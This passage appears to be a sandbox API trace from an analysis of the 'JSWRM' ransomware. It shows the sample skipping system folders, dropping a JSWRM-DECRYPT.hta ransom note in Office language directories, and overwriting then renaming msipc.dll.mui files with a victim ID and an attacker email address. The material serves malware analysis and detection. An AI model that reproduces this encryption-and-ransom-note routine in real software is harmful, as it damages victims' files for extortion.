Office\\root\\Office16\\MSIPC\\da\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\da\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\da\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\da\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.255] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.255] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0136.255] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="de", cAlternateFileName="")) returned 1 [0136.255] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0136.255] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0136.255] lstrcmpiW (lpString1="de", lpString2="...") returned 1 [0136.255] lstrcmpiW (lpString1="de", lpString2="windows") returned -1 [0136.255] lstrcmpiW (lpString1="de", lpString2="recovery") returned -1 [0136.255] lstrcmpiW (lpString1="de", lpString2="perflogs") returned -1 [0136.256] lstrcmpiW (lpString1="de", lpString2="documents and settings") returned -1 [0136.256] lstrcmpiW (lpString1="de", lpString2="$RECYCLE.BIN") returned 1 [0136.256] lstrcmpiW (lpString1="de", lpString2="system volume information") returned -1 [0136.256] lstrcmpiW (lpString1="de", lpString2="msocache") returned -1 [0136.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\de\\jswrm-decrypt.hta")) returned 0xffffffff [0136.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\de\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.257] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.257] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.258] CloseHandle (hObject=0x238) returned 1 [0136.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\de\\jswrm-decrypt.hta")) returned 0x20 [0136.258] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\de\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47e11366, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x232040 [0136.259] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.259] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47e11366, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.259] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.259] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.259] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e11366, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47e11366, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47e11366, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.259] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.259] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.259] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.259] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.259] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.259] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.259] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.259] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.259] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.259] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.260] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.260] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\de\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\de\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.261] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23704) returned 1 [0136.261] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.261] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5c90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5c90, lpOverlapped=0x0) returned 1 [0136.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.266] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5c90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5c90, lpOverlapped=0x0) returned 1 [0136.266] CloseHandle (hObject=0x314) returned 1 [0136.266] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\de\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\de\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\de\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\de\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.268] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.268] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0136.268] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="el", cAlternateFileName="")) returned 1 [0136.268] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0136.268] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0136.268] lstrcmpiW (lpString1="el", lpString2="...") returned 1 [0136.268] lstrcmpiW (lpString1="el", lpString2="windows") returned -1 [0136.268] lstrcmpiW (lpString1="el", lpString2="recovery") returned -1 [0136.268] lstrcmpiW (lpString1="el", lpString2="perflogs") returned -1 [0136.268] lstrcmpiW (lpString1="el", lpString2="documents and settings") returned 1 [0136.268] lstrcmpiW (lpString1="el", lpString2="$RECYCLE.BIN") returned 1 [0136.268] lstrcmpiW (lpString1="el", lpString2="system volume information") returned -1 [0136.268] lstrcmpiW (lpString1="el", lpString2="msocache") returned -1 [0136.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\el\\jswrm-decrypt.hta")) returned 0xffffffff [0136.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\el\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.271] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.271] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.273] CloseHandle (hObject=0x238) returned 1 [0136.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\el\\jswrm-decrypt.hta")) returned 0x20 [0136.273] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\el\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47e11366, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x232180 [0136.294] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.294] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47e11366, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.294] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.295] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.295] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e11366, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47e11366, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47e38eb0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.295] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5e98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.295] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\el\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\el\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.297] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=24216) returned 1 [0136.297] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.298] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5e90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5e90, lpOverlapped=0x0) returned 1 [0136.301] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.301] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5e90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5e90, lpOverlapped=0x0) returned 1 [0136.301] CloseHandle (hObject=0x314) returned 1 [0136.301] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\el\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\el\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\el\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\el\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.325] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5e98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", 